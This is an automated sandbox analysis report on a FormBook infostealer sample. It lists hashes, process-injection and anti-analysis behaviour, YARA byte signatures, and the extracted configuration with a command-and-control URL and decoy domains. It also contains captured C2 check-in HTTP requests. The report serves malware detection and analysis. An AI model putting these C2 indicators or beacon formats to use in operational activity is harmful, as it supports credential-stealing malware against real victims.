Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report UOMp9cDcqZ

Overview

General Information

Sample Name:UOMp9cDcqZ (renamed file extension from none to exe)
Analysis ID:433343
MD5:15d907e7d9f8286e5053796c9d78fcec
SHA1:b7d7329e94e2292ed53e2778cebec533ac599030
SHA256:771e4f69520f71afe6a6e9a4eb4de7dcd8d7521d90db290ca6c27b1a95c532af
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UOMp9cDcqZ.exe (PID: 5852 cmdline: 'C:\Users\user\Desktop\UOMp9cDcqZ.exe' MD5: 15D907E7D9F8286E5053796C9D78FCEC)
    • UOMp9cDcqZ.exe (PID: 6412 cmdline: C:\Users\user\Desktop\UOMp9cDcqZ.exe MD5: 15D907E7D9F8286E5053796C9D78FCEC)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 4860 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • colorcpl.exe (PID: 4840 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 6444 cmdline: /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 21 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.0.UOMp9cDcqZ.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.UOMp9cDcqZ.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.0.UOMp9cDcqZ.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x166a9:$sqlite3step: 68 34 1C 7B E1
          • 0x167bc:$sqlite3step: 68 34 1C 7B E1
          • 0x166d8:$sqlite3text: 68 38 2A 90 C5
          • 0x167fd:$sqlite3text: 68 38 2A 90 C5
          • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
          1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x10aa68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x10adf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x131c88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x132012:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x116b05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x13dd25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x1165f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x13d811:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x116c07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13de27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x116d7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x13df9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x10b80a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x132a2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x11586c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x13ca8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x10c582:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1337a2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x11bbf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x142e17:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x11cc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 10 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: UOMp9cDcqZ.exeVirustotal: Detection: 16%Perma Link
            Source: UOMp9cDcqZ.exeMetadefender: Detection: 22%Perma Link
            Source: UOMp9cDcqZ.exeReversingLabs: Detection: 50%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: UOMp9cDcqZ.exeJoe Sandbox ML: detected
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: UOMp9cDcqZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: UOMp9cDcqZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: UOMp9cDcqZ.exe
            Source: Binary string: colorcpl.pdbGCTL source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
            Source: Binary string: colorcpl.pdb source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: UOMp9cDcqZ.exe, 00000002.00000003.245683230.0000000001050000.00000004.00000001.sdmp, colorcpl.exe, 0000000F.00000002.494600161.00000000046D0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: UOMp9cDcqZ.exe, colorcpl.exe
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 4x nop then pop edi
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.yunlimall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.dmgt4m2g8y2uh.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.thesoulrevitalist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.newmopeds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.hazard-protection.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
            Source: Joe Sandbox ViewASN Name: BIT-ISLEEquinixJpapanEnterpriseKKJP BIT-ISLEEquinixJpapanEnterpriseKKJP
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.yunlimall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.dmgt4m2g8y2uh.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.thesoulrevitalist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.newmopeds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.hazard-protection.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: clientconfig.passport.net
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: GET, POST, PUT, DELETEAccess-Control-Allow-Headers: AuthorizationDate: Fri, 11 Jun 2021 14:58:19 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 6
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: UOMp9cDcqZ.exe, 00000001.00000002.248963538.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: UOMp9cDcqZ.exe, 00000001.00000003.233796502.0000000005B09000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersU
            Source: UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
            Source: UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comuev
            Source: UOMp9cDcqZ.exe, 00000001.00000003.228190439.0000000005B1B000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.c
            Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn.
            Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/MI
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
